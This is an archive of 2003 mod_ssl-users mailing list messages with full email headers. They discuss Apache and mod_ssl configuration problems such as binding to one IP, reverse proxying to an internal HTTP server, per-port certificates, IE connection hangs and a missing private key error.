User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  6 10:30:16 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DF7732AA020; Thu,  6 Mar 2003 10:30:15 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cus.org.uk (host213-106-240-81.no-dns-yet.ntli.net [213.106.240.81])
	by master.modssl.org (Postfix) with ESMTP id 2D7E42AA015
	for ; Thu,  6 Mar 2003 10:30:13 +0100 (CET)
Received: from cus.org.uk (localhost.cus.org.uk [127.0.0.1])
	by cus.org.uk (8.12.6/8.11.3) with ESMTP id h269U99M041781
	for ; Thu, 6 Mar 2003 09:30:09 GMT
	(envelope-from markb@cus.org.uk)
Received: from localhost (markb@localhost)
	by cus.org.uk (8.12.6/8.12.6/Submit) with ESMTP id h269U9jU041778
	for ; Thu, 6 Mar 2003 09:30:09 GMT
Date: Thu, 6 Mar 2003 09:30:08 +0000 (GMT)
From: Mark Boddington 
To: modssl-users@modssl.org
Subject: Re: stop apache/mod_ssl binding to all IP's.
In-Reply-To: <3E66EC7C.4000002@adroit.net>
Message-ID: <20030306092003.M41569@cus.org.uk>
References: <3E66EC7C.4000002@adroit.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mark Boddington 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hi Terry,

Perhaps your directives are being overridden in a "IfDefine SSL" or
"IfModule SSL" block ? Listen IP:Port does work, works for me. Do you
have the following in your config ?

Listen my.ip.address:443
...
NameVirtualHost my.ip.address:443
...

...


Cheers,

Mark


On Thu, 6 Mar 2003, Terry Kerr wrote:

> Hi,
>
> I am running apache 1.3.26 and mod_ssl 2.8.9-2.1 on a debian linux system.
>
> The system has two IP's, and I only wish for apache to start on ports 80 and 443
> on one of those IPs.  I am using named based virtual hosting for many sites on
> the system for http, and have just one virtual host setup for https on port 443.
>   The problem that I am having is that I cannot stop mod_ssl from binding to
> port 443 on both the IP's on my system.  I have tried every possible combination
> of Listen, BindAddress, and Port, and have managed to prevent http from starting
> on all IP's, but https still starts on all IPs.  Is there any way to stop this?
>
ddD> Will I need to start two seperate servers, one serving http only, and
one
> serving https only?  If I was to do this, I may as well go back to using
> apache-ssl which is the default installation on debian anyway.
>
> Thanks in advance
>
> terry
>
> --
> Terry Kerr (terry@adroit.net)
> Adroit Internet Solutions (www.adroit.net)
> Phone: +61 3 9563 4461
> Fax: +61 3 9563 3856
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  6 13:29:31 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E54212AA020; Thu,  6 Mar 2003 13:29:30 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from maila.telia.com (maila.telia.com [194.22.194.231])
	by master.modssl.org (Postfix) with ESMTP id 384CF2AA015
	for ; Thu,  6 Mar 2003 13:29:29 +0100 (CET)
Received: from d1o908.telia.com (d1o908.telia.com [213.64.0.241])
	by maila.telia.com (8.12.8/8.12.8) with ESMTP id h26CTNB5011138
	for ; Thu, 6 Mar 2003 13:29:23 +0100 (CET)
X-Original-Recipient: 
Received: from h59n2fls21o908.telia.com (h59n2fls21o908.telia.com [217.211.143.59])
	by d1o908.telia.com (8.8.8/8.8.8) with ESMTP id NAA00619
	for ; Thu, 6 Mar 2003 13:29:22 +0100 (CET)
From: danalien 
Organization: datormaffian.com
To: modssl-users@modssl.org
Subject: Re: Proxy http with modssl?
Date: Thu, 6 Mar 2003 14:29:42 +0100
User-Agent: KMail/1.5
References: 
In-Reply-To: 
MIME-Version: 1.0
Content-Type: Text/Plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Content-Description: clearsigned data
Content-Disposition: inline
Message-Id: <200303061430.07418.danalien@datormaffian.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: danalien 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

=2D----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Thursday 06 March 2003 06:56, Marko Asplund wrote:
> On Wed, 5 Mar 2003, Chris Davis wrote:
> >  I'm looking for a method to hide an old web server behindt=20
> >  a modssl server. The hidden server has several applications
> >  served over http. What I'd like is for https requests
> >  to be rewritten in modssl and proxied to the hidden
> >  internal system.
> >  ...
>
> there are probably several possible implementations for the reverse proxy
> configuration you're describing but one possibility is to use mod_accel
> (http://sysoev.ru/mod_accel/) for this purpose.
>

or you could run stunnel (on that old machine, and close every other port e=
xcept the one stunnel uses, or use
port-forwarding on the "remote-pc" that uses stunnel to communicate with ss=
l-based software...).=20

"Stunnel is a program that allows you to encrypt arbitrary TCP connections=
=20
inside SSL (Secure Sockets Layer) available on both Unix and Windows.=20
Stunnel can allow you to secure non-SSL aware daemons and protocols=20
(like POP, IMAP, LDAP, etc) by having Stunnel provide the encryption,=20
requiring no changes to the daemon's code." -- www.stunnel.org=20

=2D --=20

//   with regards
//   ID ::  danalien  ::  
=2D----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE+Z01VHoWhCURqoogRAt6yAKCW6E6kolwJmV2YAhUVgFf9FLlqsACeMxhd
+7BO07aYNgXKUpKp9wIsUNs=3D
=3DRFh4
=2D----END PGP SIGNATURE-----

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  6 15:42:14 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6276B2AA020; Thu,  6 Mar 2003 15:42:14 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id A3B572AA015
	for ; Thu,  6 Mar 2003 15:42:11 +0100 (CET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id JAA05265;
	Thu, 6 Mar 2003 09:39:57 -0500
Date: Thu, 6 Mar 2003 09:39:57 -0500 (EST)
From: "R. DuFresne" 
To: Terry Kerr 
Cc: modssl-users@modssl.org
Subject: Re: stop apache/mod_ssl binding to all IP's.
In-Reply-To: <3E66EC7C.4000002@adroit.net>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, 6 Mar 2003, Terry Kerr wrote:

> Hi,
> 
> I am running apache 1.3.26 and mod_ssl 2.8.9-2.1 on a debian linux system.
> 
> The system has two IP's, and I only wish for apache to start on ports 80 and 443 
> on one of those IPs.  I am using named based virtual hosting for many sites on 
> the system for http, and have just one virtual host setup for https on port 443. 
>   The problem that I am having is that I cannot stop mod_ssl from binding to 
> port 443 on both the IP's on my system.  I have tried every possible combination 
> of Listen, BindAddress, and Port, and have managed to prevent http from starting 
> on all IP's, but https still starts on all IPs.  Is there any way to stop this?
> 
> Will I need to start two seperate servers, one serving http only, and one 
> serving https only?  If I was to do this, I may as well go back to using 
> apache-ssl which is the default installation on debian anyway.
> 


add the IP address or FQDN to the port designation for the appropriate
listen paramater:


Listen someplace.com:80
Listen someplace.com:443



> Thanks in advance
> 
> terry
> 
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  6 16:32:35 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4F7022AA020; Thu,  6 Mar 2003 16:32:35 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns0a.swx.com (ns0a.swx.com [146.109.240.107])
	by master.modssl.org (Postfix) with ESMTP id CE16E2AA015
	for ; Thu,  6 Mar 2003 16:32:33 +0100 (CET)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0a.swx.com (8.12.8/8.12.6) with ESMTP id h269pWRH014844
	for ; Thu, 6 Mar 2003 10:51:32 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.6/8.12.6) with ESMTP id h269pV2M025227
	for ; Thu, 6 Mar 2003 10:51:31 +0100 (MET)
Content-Class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: two server certificates.
Date: Thu, 6 Mar 2003 10:51:30 +0100
Message-ID: 
X-MS-Has-Attach: 
Importance: normal
X-MS-TNEF-Correlator: 
Thread-Topic: two server certificates.
thread-index: AcLjbFRT/qTnsUgkR8KheAO003THzgAWVpeg
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

>-----Original Message-----
>From: kulkarni veena [mailto:veenacsus@yahoo.com]
>
>I have one machine which has apache+mod_ssl with a
>self signed server certificate. is it possible to have
>another self signed certificate using the same
>Apache+mod_ssl instance but say a different port?

Yes. You simply make two port-based virtualhosts and put the
SSLCertificate* directives for cert 1 inside VH 1 and for cert 2 inside
VH 2.

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored. 
>
>
>thanks in advance.
>
>-veena
>
>
>__________________________________________________
>Do you Yahoo!?
>Yahoo! Tax Center - forms, calculators, tips, more
>http://taxes.yahoo.com/
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  6 17:07:53 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 028942AA020; Thu,  6 Mar 2003 17:07:52 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from dns.local.suitsyou.com (gso26-144-009.triad.rr.com [66.26.144.9])
	by master.modssl.org (Postfix) with ESMTP id 1AA0C2AA015
	for ; Thu,  6 Mar 2003 17:07:51 +0100 (CET)
Received: from dns.local.suitsyou.com (IDENT:28249@localhost [127.0.0.1])
	by dns.local.suitsyou.com (8.12.6/8.12.4) with ESMTP id h26G7mAI014075
	for ; Thu, 6 Mar 2003 11:07:48 -0500
Received: (from jgelb@localhost)
	by dns.local.suitsyou.com (8.12.6/8.12.4/Submit) id h26G7lTq014073
	for modssl-users@modssl.org; Thu, 6 Mar 2003 11:07:47 -0500
Date: Thu, 6 Mar 2003 11:07:47 -0500
From: jgelb 
To: modssl-users@modssl.org
Subject: more info Re: intermittent IE problem,
Message-ID: <20030306160747.GC9600@pearsoncmg.com>
References: <20030304121358.J3032@cus.org.uk> <20030304151430.F6089@cus.org.uk> <20030304164412.GA13868@pearsoncmg.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20030304164412.GA13868@pearsoncmg.com>
User-Agent: Mutt/1.4i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: jgelb 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Some more info:

Looking more closely as ssl logs, I think I'm seeing the following
behavior during our freezes:

[06/Mar/2003 10:32:43 24491] [trace] OpenSSL: Loop: before/accept
initialization 
[06/Mar/2003 10:37:23 24443] [debug] OpenSSL: I/O error, 5 bytes
expected to read on BIO#001C4278 [mem: 00288B30]

The server is completely unresponsive until after the I/O error is
logged.  Sometimes that's right away, other times it's 5 minutes, per
above.

On the subject of logging, I'm occassionally seeing something like:
[06/Mar/2003 11:03:42 24782] [debug] OpenSSL: read 788/34821 bytes
from BIO#001783D0 [mem: 0021DF50] (BIO dump follows)

Is the "short" read really a short read, or just the debugging system
logging something before the read is complete?  

Thanks for any and all info.

-- jeff gelb



On Tue, Mar 04, 2003 at 11:44:12AM -0500, jgelb wrote:
> 
> Fwiw, I'm getting nearly identical symptoms as well.  After an
> indeterminate amount of time, SSL requests to the server seem to hang
> indefinitely.   The problem appears to temporarily clear itself for a
> short time.
> 

> -- jeff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  6 18:46:08 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7E0752AA020; Thu,  6 Mar 2003 18:46:08 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from voyager.scgis.com. (adsl-068-016-197-035.sip.cae.bellsouth.net [68.16.197.35])
	by master.modssl.org (Postfix) with ESMTP id 6BF952AA015
	for ; Thu,  6 Mar 2003 18:46:06 +0100 (CET)
Received: from crash (adsl-068-016-197-034.sip.cae.bellsouth.net [68.16.197.34])
	by voyager.scgis.com. (8.12.8/8.12.8) with SMTP id h26Hk2nn007865
	for ; Thu, 6 Mar 2003 12:46:03 -0500 (EST)
	(envelope-from cdavis@scgis.com)
Message-ID: <004401c2e408$ba19a7b0$0301010a@crash>
From: "Chris Davis" 
To: 
References: <00a101c2e350$98ce2210$0301010a@crash>
Subject: Re: Proxy http with modssl?
Date: Thu, 6 Mar 2003 12:49:24 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Chris Davis" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

 

 Thanks everyone for the follow ups. I want to use mod_
 Rewrite if I can get it to work. I've added the module
 in the server and in my virtualhost clause have these
 statements

 RewriteEngine On
 RewriteRule MyApp\/Version\/Five\/ http://10.x.x.x/Version/Five/ [P,NE,L]

 I call the application as https://modssl/MyApp/Version/Five/?Arg1=1&Arg2=2
 The internal server receives the URL but has this in the 
 access logs

 GET /Version/Five/%3FArg1=1&Arg2=2

 So it appears as if this is close to working. How can I
 prevent the '?' from being changed to a '%3F' by Rewrite?


 Chris
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  6 19:55:42 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EFCFC2AA020; Thu,  6 Mar 2003 19:55:41 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from exchange.sds.no (exchange.sds.no [139.105.2.11])
	by master.modssl.org (Postfix) with ESMTP id CE6C62AA015
	for ; Thu,  6 Mar 2003 19:55:39 +0100 (CET)
Received: by exchange.sds.no with Internet Mail Service (5.5.2654.42)
	id ; Thu, 6 Mar 2003 14:10:13 +0100
Message-ID: 
From: Torvald Baade Bringsvor 
To: "'modssl-users@modssl.org'" 
Subject: RE: Proxy http with modssl?
Date: Thu, 6 Mar 2003 14:10:13 +0100 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2654.42)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Torvald Baade Bringsvor 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

If you wish to terminate the https on the "new" machine and communicate to
the old computer using http, then mod_proxy is what works for us. We use it
extensively.

-Torvald


-----Original Message-----
From: danalien [mailto:danalien@datormaffian.com]
Sent: 6. mars 2003 14:30
To: modssl-users@modssl.org
Subject: Re: Proxy http with modssl?


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Thursday 06 March 2003 06:56, Marko Asplund wrote:
> On Wed, 5 Mar 2003, Chris Davis wrote:
> >  I'm looking for a method to hide an old web server behindt 
> >  a modssl server. The hidden server has several applications
> >  served over http. What I'd like is for https requests
> >  to be rewritten in modssl and proxied to the hidden
> >  internal system.
> >  ...
>
> there are probably several possible implementations for the reverse proxy
> configuration you're describing but one possibility is to use mod_accel
> (http://sysoev.ru/mod_accel/) for this purpose.
>

or you could run stunnel (on that old machine, and close every other port
except the one stunnel uses, or use
port-forwarding on the "remote-pc" that uses stunnel to communicate with
ssl-based software...). 

"Stunnel is a program that allows you to encrypt arbitrary TCP connections 
inside SSL (Secure Sockets Layer) available on both Unix and Windows. 
Stunnel can allow you to secure non-SSL aware daemons and protocols 
(like POP, IMAP, LDAP, etc) by having Stunnel provide the encryption, 
requiring no changes to the daemon's code." -- www.stunnel.org 

- -- 

//   with regards
//   ID ::  danalien  ::  
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE+Z01VHoWhCURqoogRAt6yAKCW6E6kolwJmV2YAhUVgFf9FLlqsACeMxhd
+7BO07aYNgXKUpKp9wIsUNs=
=RFh4
-----END PGP SIGNATURE-----

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  6 20:17:02 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 249B32AA027; Thu,  6 Mar 2003 20:17:02 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from matrix.pelathe.org (100.34.cm.sunflower.com [24.124.34.100])
	by master.modssl.org (Postfix) with ESMTP id 87B7F2AA01A
	for ; Thu,  6 Mar 2003 20:16:59 +0100 (CET)
Received: from matrix (matrix.pelathe.org [192.168.1.200])
	by matrix.pelathe.org (Postfix) with ESMTP id 2969E80E5B
	for ; Fri,  7 Mar 2003 15:42:00 -0600 (CST)
Content-Type: text/plain;
  charset="us-ascii"
From: "A. Putnam" 
Organization: Pelathe Comminuty Resource Center
To: modssl-users@modssl.org
Subject: private key not found
Date: Fri, 7 Mar 2003 15:42:00 -0600
User-Agent: KMail/1.4.3
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Message-Id: <200303071542.00371.aputnam@pelathe.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "A. Putnam" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I'm trying to get mod_ssl to work on my server, but each time I try to re=
start=20
apache with mod_ssl activated, it gives me this error:

/etc/init.d/apache start returned 7 (Program is not running.)
Starting httpd [ Mailman PHP4 SSL ]Apache/1.3.26 mod_ssl/2.8.10 (Pass Phr=
ase=20
Dialog)
Some of your private key files are encrypted for security reasons.
In order to read them you have to provide us with the pass phrases.

Server matrix.pelathe.org:443 (RSA)
Enter pass phrase:
Apache:mod_ssl:Error: Private key not found.
**Stopped
stty: standard input: Inappropriate ioctl for device
=2E.failed

What I don't understand is how it can't find the Private key. The=20
SSLCertificateKeyFile path in httpd.conf matches the location of the key =
in=20
my directory. Isn't the SSLCertificateKeyFile the Private Key path?

I'm including the Virtual Host code (sans the explination text and a pass=
key).=20
I'm very new to this so I won't be surprised if there is a glaring error =
in=20
here that I missed...



DocumentRoot "/srv/www/htdocs"
ServerName matrix.pelathe.org
ServerAdmin tkitchen@pelathe.org
ErrorLog /var/log/httpd/error_log
TransferLog /var/log/httpd/access_log

SSLEngine on

SSLCipherSuite=20
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

SSLCertificateFile /etc/httpd/ssl.crt/server.crt
#SSLCertificateFile /etc/httpd/ssl.crt/server-dsa.crt

SSLCertificateKeyFile /etc/httpd/ssl.key/server.key
#SSLCertificateKeyFile /etc/httpd/ssl.key/server-dsa.key

SSLCertificateChainFile /etc/httpd/ssl.crt/ca.crt

#SSLCACertificatePath /etc/httpd/ssl.crt
SSLCACertificateFile /etc/httpd/ssl.crt/ca-bundle.crt

SSLCARevocationPath /etc/httpd/ssl.crl
#SSLCARevocationFile /etc/httpd/ssl.crl/ca-bundle.crl

SSLVerifyClient require
SSLVerifyDepth  10

#
#SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)/ \
#            and %{SSL_CLIENT_S_DN_O} eq "Snake Oil, Ltd." \
#            and %{SSL_CLIENT_S_DN_OU} in {"Staff", "CA", "Dev"} \
#            and %{TIME_WDAY} >=3D 1 and %{TIME_WDAY} <=3D 5 \
#            and %{TIME_HOUR} >=3D 8 and %{TIME_HOUR} <=3D 20       ) \
#           or %{REMOTE_ADDR} =3D~ m/^192\.76\.162\.[0-9]+$/
#

#SSLOptions +FakeBasicAuth +ExportCertData +CompatEnvVars +StrictRequire

    SSLOptions +StdEnvVars


    SSLOptions +StdEnvVars


SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0

CustomLog /var/log/httpd/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"



Any help would be greatly appreciated. I'm using Apache 1.3.26 and Mod_SS=
L=20
2.8.10 on a SuSE 8.1 box.

Thanks,
-Andrew
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  6 20:32:15 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B692A2AA01A; Thu,  6 Mar 2003 20:32:15 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.tfmx.com (user.teleformix.com [12.15.20.65])
	by master.modssl.org (Postfix) with ESMTP id 9B6B62AA038
	for ; Thu,  6 Mar 2003 20:32:13 +0100 (CET)
Received: from rgedyew2k (rgedye-tfmx.tfmx.com [192.168.5.159])
	by mail.tfmx.com (8.9.3/8.9.3) with SMTP id NAA27422
	for ; Thu, 6 Mar 2003 13:32:07 -0600
Message-ID: <02db01c2e417$bc7462c0$9f05a8c0@rgedyew2k>
From: "Ron Gedye" 
To: 
References: <200303071542.00371.aputnam@pelathe.org>
Subject: Re: private key not found
Date: Thu, 6 Mar 2003 13:36:51 -0600
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ron Gedye" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Please check the permissions on your private key.  They should be readable
only by owner (400)

(knee-jerk first guess reaction)

Best of luck

----- Original Message -----
From: "A. Putnam" 
To: 
Sent: Friday, March 07, 2003 3:42 PM
Subject: private key not found


I'm trying to get mod_ssl to work on my server, but each time I try to
restart
apache with mod_ssl activated, it gives me this error:

/etc/init.d/apache start returned 7 (Program is not running.)
Starting httpd [ Mailman PHP4 SSL ]Apache/1.3.26 mod_ssl/2.8.10 (Pass Phrase
Dialog)
Some of your private key files are encrypted for security reasons.
In order to read them you have to provide us with the pass phrases.

Server matrix.pelathe.org:443 (RSA)
Enter pass phrase:
Apache:mod_ssl:Error: Private key not found.
**Stopped
stty: standard input: Inappropriate ioctl for device
..failed

What I don't understand is how it can't find the Private key. The
SSLCertificateKeyFile path in httpd.conf matches the location of the key in
my directory. Isn't the SSLCertificateKeyFile the Private Key path?

I'm including the Virtual Host code (sans the explination text and a
passkey).
I'm very new to this so I won't be surprised if there is a glaring error in
here that I missed...



DocumentRoot "/srv/www/htdocs"
ServerName matrix.pelathe.org
ServerAdmin tkitchen@pelathe.org
ErrorLog /var/log/httpd/error_log
TransferLog /var/log/httpd/access_log

SSLEngine on

SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

SSLCertificateFile /etc/httpd/ssl.crt/server.crt
#SSLCertificateFile /etc/httpd/ssl.crt/server-dsa.crt

SSLCertificateKeyFile /etc/httpd/ssl.key/server.key
#SSLCertificateKeyFile /etc/httpd/ssl.key/server-dsa.key

SSLCertificateChainFile /etc/httpd/ssl.crt/ca.crt

#SSLCACertificatePath /etc/httpd/ssl.crt
SSLCACertificateFile /etc/httpd/ssl.crt/ca-bundle.crt

SSLCARevocationPath /etc/httpd/ssl.crl
#SSLCARevocationFile /etc/httpd/ssl.crl/ca-bundle.crl

SSLVerifyClient require
SSLVerifyDepth  10

#
#SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)/ \
#            and %{SSL_CLIENT_S_DN_O} eq "Snake Oil, Ltd." \
#            and %{SSL_CLIENT_S_DN_OU} in {"Staff", "CA", "Dev"} \
#            and %{TIME_WDAY} >= 1 and %{TIME_WDAY} <= 5 \
#            and %{TIME_HOUR} >= 8 and %{TIME_HOUR} <= 20       ) \
#           or %{REMOTE_ADDR} =~ m/^192\.76\.162\.[0-9]+$/
#

#SSLOptions +FakeBasicAuth +ExportCertData +CompatEnvVars +StrictRequire

    SSLOptions +StdEnvVars


    SSLOptions +StdEnvVars


SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0

CustomLog /var/log/httpd/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"



Any help would be greatly appreciated. I'm using Apache 1.3.26 and Mod_SSL
2.8.10 on a SuSE 8.1 box.

Thanks,
-Andrew
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  6 20:55:30 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A7C5E2AA020; Thu,  6 Mar 2003 20:55:30 +0100 (CET)
X-Original-To: modssl-users@modssl.org
